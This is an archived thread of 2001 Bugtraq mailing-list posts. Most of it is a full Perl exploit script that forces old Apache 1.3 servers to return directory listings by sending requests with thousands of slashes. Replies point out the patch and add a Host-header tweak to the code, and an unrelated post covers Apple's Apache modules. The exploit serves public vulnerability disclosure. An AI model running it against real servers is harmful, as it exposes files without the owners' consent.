6618149 2001-06-13 02:44 -0500 /123 rader/ Matt Watchinski <matt@farm9.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-13 21:25 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17406>
Ärende: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing
------------------------------------------------------------
Exploit
From: Matt Watchinski <matt@farm9.com>
To: bugtraq@securityfocus.com
Message-ID: <3B2719E3.FA5BD8F4@farm9.com>
#!/usr/bin/perl
#
# farm9, Inc. (copyright 2001)
#
# Name: Apache Artificially Long Slash Path Directory Listing Exploit
# Author: Matt Watchinski
# Ref: SecurityFocus BID 2503
#
# Affects: Apache 1.3.17 and below
# Tested on: Apache 1.3.12 running on Debian 2.2
#
# Info: This exploit tricks apache into returning a Index of the a
directory
# even if an index.html file is present. May not work on some OS's
#
# Details: http_request.c has a subroutine called ap_sub_req_lookup_file
that in
# very specific cases would feed stat() a filename that was longer
than
# stat() could handle. This would result in a condition where stat()
# would return 0 and a directory index would be returned instead of
the
# default index.html.
#
# Code Fragment: /src/main/http_request.c
# if (strchr(new_file, '/') == NULL) {
# char *udir = ap_make_dirstr_parent(rnew->pool, r->uri);
#
# rnew->uri = ap_make_full_path(rnew->pool, udir, new_file);
# rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file);
# ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values
*/
# if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important
part
# rnew->finfo.st_mode = 0;
# }
#
# Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be
enabled
# The directory must also have the following Options enabled:
# Indexes and MultiView
# Some OS's have different conditions on the number of character
# you have to pass to stat to make this work. If stat doesn't
# return 0 for path names less than 8192 or so internal apache
# buffer checks will stop this exploit from working.
#
# Debian needed around 4060 /'s to make this work.
#
# Greets: Special thanks to natasha who added a lot of debug to apache
for me
# while i was trying to figure out what had to be enabled to make this
# exploit work. Also thanks to rfp for pointing out that MultiView
# needed to be enabled.
#
# More Greets: Jeff for not shooting me :) <All your Cisco's belong to
us>
# Anne for being so sexy <I never though corporate
espionage
# would be so fun>
# All my homies at farm9
# DJ Charles / DJ NoloN for the phat beats
# Marty (go go gadget snort)
# All my ex-bees
# RnVjazpIaXZlcndvcmxk
#
# I think that wraps it up. Have fun.
#
# Usage: ./apacheIndex.pl <host> <port> <HI> <Low>
# Where: Hi and low are the range for the number of / to try
#
use IO::Socket;
$low = $ARGV[3]; #Low number of slash characters to try
$hi = $ARGV[2]; #High number of slash characters to try
$port = $ARGV[1]; #Port to try to connect to
$host = $ARGV[0]; #Host to try to connect to
# Main loop. Not much to this exploit once you figure out what needed
to
# be enabled. Need to do some more testing on sub-dirs to see if it
# works with them. It should. Also different OS's might use a differnt
number
# of /. Send me the numbers if you don't mind matt@farm9.com
while($low <= $hi)
{
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port,
Proto => "TCP") or die "Connect Failed";
$url = "";
$buffer = "";
$end = "";
$url = "GET ";
$buffer = "/" x $low . " HTTP/1.0\r\n";
$end = "\r\n\r\n";
$url = $url . $buffer . $end;
print $socket "$url";
while(<$socket>)
{
if($_ =~ "Index of")
{
print "Found the magic number: $low\n";
print "Now go do it by hand to to see it all\n";
close($socket);
exit;
}
}
close($socket);
$low++
}
(6618149) /Matt Watchinski <matt@farm9.com>/--------
6622519 2001-06-14 16:54 +0100 /37 rader/ Ben Laurie <ben@algroup.co.uk>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-14 21:34 av Brevbäraren
Extern mottagare: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Mottagare: Bugtraq (import) <17433>
Ärende: Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory
------------------------------------------------------------
Listing Exploit
From: Ben Laurie <ben@algroup.co.uk>
To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
Message-ID: <3B28DE19.8DD74E6B@algroup.co.uk>
Matt Watchinski wrote:
> # Name: Apache Artificially Long Slash Path Directory Listing Exploit
> # Author: Matt Watchinski
> # Ref: SecurityFocus BID 2503
> #
> # Affects: Apache 1.3.17 and below
Doh! From apache 1.3.x CHANGES file:
Changes with Apache 1.3.18 [not released]
*) SECURITY: The default installation could lead to mod_negotiation
and mod_dir/mod_autoindex displaying a directory listing instead of
the index.html.* files, if a very long path was created
artificially
by using many slashes. Now a 403 FORBIDDEN is returned.
[Martin Kraemer]
Of course, 1.3.19 _was_ released. Ages ago.
Cheers,
Ben.
--
http://www.apache-ssl.org/ben.html
"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff
(6622519) /Ben Laurie <ben@algroup.co.uk>/----------
6626537 2001-06-15 14:48 +1200 /26 rader/ Stephen Cope <mail-d-20010615@kimihia.org.nz>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-15 18:00 av Brevbäraren
Extern mottagare: Matt Watchinski <matt@farm9.com>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17444>
Kommentar till text 6618149 av Matt Watchinski <matt@farm9.com>
Ärende: Re: Bugtraq ID 2503 : Apache Artificially Long Slash Path Directory Listing Exploit
------------------------------------------------------------
From: Stephen Cope <mail-d-20010615@kimihia.org.nz>
To: Matt Watchinski <matt@farm9.com>
Cc: bugtraq@securityfocus.com
Message-ID: <20010615144844.A20679@mess.kimihia.org.nz>
In my testing you need to take the Host header into account.
: $url = "GET ";
: $buffer = "/" x $low . " HTTP/1.0\r\n";
: $end = "\r\n\r\n";
The server I tested against uses mod_rewrite to do virtual hosting,
and it arrived at a different magic number with the host header, and
against without the header.
I made the following change to the above code:
$buffer = "/" x $low . " HTTP/1.0\r\nHost: ". $host ."\r\n";
Should be fairly easy to understand.
--
Stephen Cope <http://sdc.org.nz/>
Sign the petition and Stop the Pop: http://lifefm.org.nz/petition/
(6626537) /Stephen Cope <mail-d-20010615@kimihia.org.nz>/(Ombruten)
6626597 2001-06-14 18:44 -0700 /38 rader/ Peter Bierman <bierman@apple.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-06-15 18:15 av Brevbäraren
Extern mottagare: Stefan Arentz <stefan.arentz@soze.com>
Extern kopiemottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17445>
Kommentar till text 6604222 av Stefan Arentz <stefan.arentz@soze.com>
Ärende: Re: Mac OS X - Apache & Case Insensitive Filesystems
------------------------------------------------------------
From: Peter Bierman <bierman@apple.com>
To: Stefan Arentz <stefan.arentz@soze.com>
Cc: BUGTRAQ@securityfocus.com
Message-ID: <v03130307b74f18275a2f@[17.202.21.230]>
At 7:53 PM +0200 6/10/01, Stefan Arentz wrote:
>Preferred solution:
>
> Modification to Apache so that it does a check for the 'real'
> filename. This probably needs some support from the underlying
> operating system.
>
> Or Apple should submit their HFS+ patches to the Apache Software
> Foundation or install the mod_hfs_apple.so module on OS X Client.
From darwin-development@lists.apple.com:
The source code for the following software components which shipped
with Mac OS X Server 10.0 is available from
http://www.opensource.apple.com/projects/darwin/darwinserver/
MySQL 3.23.32
Samba 2.0.8
Tomcat 3.1
ApacheModules
- mod_auth_apple
- mod_hfs_apple
- mod_macbinary_apple
- mod_sherlock_apple
(I had nothing to do with the above, I'm only forwarding the info.)
-pmb
(6626597) /Peter Bierman <bierman@apple.com>/(Ombruten)